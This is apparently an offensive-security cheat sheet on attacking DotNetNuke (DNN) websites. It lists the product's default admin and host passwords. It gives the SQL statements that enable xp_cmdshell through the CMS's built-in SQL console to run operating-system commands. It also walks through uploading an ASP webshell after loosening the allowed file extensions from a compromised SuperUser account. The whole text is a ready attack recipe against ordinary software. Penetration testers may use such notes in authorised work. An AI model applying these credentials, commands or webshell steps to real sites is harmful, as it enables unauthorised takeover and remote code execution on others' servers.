DNN

Default Creds

$ creds search DotNetNuke
+------------------------+----------+----------+
| Product                | username | password |
+------------------------+----------+----------+
| dotnetnuke corporation |  admin   | dnnadmin |
| dotnetnuke corporation |   host   | dnnhost  |
+------------------------+----------+----------+

RCE

SQL Console

System command can be run via the built-in SQL console under the Settings menu.

# enable xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

After pressing Run Script OS commands can be executed.

xp_cmdshell 'whoami'

ASP Webshell

If the SuperUser account is compromised, we can access the Security settings (Figure 1) and allow any file extensions needed so we can upload a webshell (Figure 2).

Figure 1: Accessing the Security settings.

Figure 2: Add the desired file extensions.

Upload a webshell, such as this .asp webshell (Figure 3).

Figure 3: Uploiad the webshell.

Get the file's URL by right-clicking and interact with the webshell.

Figure 4: Get the URL and interact with the webshell.

Resources

DNN

Content Management System - .NET CMS Software from DNN